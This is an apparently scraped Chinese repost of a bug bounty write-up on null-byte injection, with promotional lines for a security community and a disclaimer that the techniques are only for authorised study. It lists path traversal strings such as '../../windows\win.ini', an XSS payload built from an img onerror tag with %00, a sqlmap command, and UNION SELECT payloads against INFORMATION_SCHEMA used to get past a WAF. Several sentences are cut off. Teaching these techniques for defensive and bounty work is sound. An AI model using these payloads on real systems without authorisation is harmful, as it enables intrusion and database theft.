扫码领资料
获网安教程
来Track安全社区投稿~
赢千元稿费!还有保底奖励~(https://bbs.zkaq.cn)
大家好,我是 0xold,一名渗透测试员,8 个月前开始了我的漏洞悬赏之旅。今天,我将分享几个我通过 Null 字节注入发现的漏洞,如果没有它们,这些漏洞将无法利用。我将把所有网站称为 company.com,因为我不能披露公司的名称。
什么是 Null 字节字符?
密码重置解析混淆
/test,并检查了我的电子邮件,得到了以下 URL:路径遍历到 XSS
templatename。我迅速用 templatename=0xold 的值发出了请求,并检查了服务器的响应。logout.asp
../login.asp
..\login.asp
….//login.asp
….//login.asp%00
….\login.asp
../../windows\win.ini
....\windows\win.ini
templatename 参数不在白名单中就返回 500 状态错误。为了验证我的理论,我决定使用工具 Cewl 来生成一个自定义字典。什么是 Cewl
../ 序列?于是我在 templatename 参数中注入了以下值并检查了响应:company.com/0xoldSaysHi/../company/0xoldSaysHi”>/../> 字符没有被反映出来,所以我尝试在 > 字符后面注入一个 null 字节字符,看看会发生什么:company/0xoldSaysHi”>%00/../company/0xoldSaysHi”%00><%00img+src=x+onerror=alert(1337)%00>/../通过 Null Byte 注入绕过内部 WAF
error_category 参数中输入一个常规的单引号('),网站返回了一个数据库错误,这表明它容易受到 SQL 注入攻击。太好了!我会保存这个请求,然后运行 sqlmap,让它完成所有繁重的工作。r 的文件后,我运行了以下命令:python3 sqlmap.py -r r --batch --dbs --random-agentUNION+SELECT+1337 -- -
UNION/**/SELECT+1337
test+test+1337 -- -
f’+/**/UNION+%00seLecT+%00TABLE_NAME,TABLE_schema,NULL,NULL,NULL,NULL+FROM+%00INFORMATION_SCHEMA.tables+WHERE+table_schema=’AdminDB’%23声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!
如果你是一个网络安全爱好者,欢迎加入我的知识星球:zk安全知识星球,我们一起进步一起学习。星球不定期会分享一些前沿漏洞,每周安全面试经验、SRC实战纪实等文章分享,微信识别二维码,只需25,即可加入。
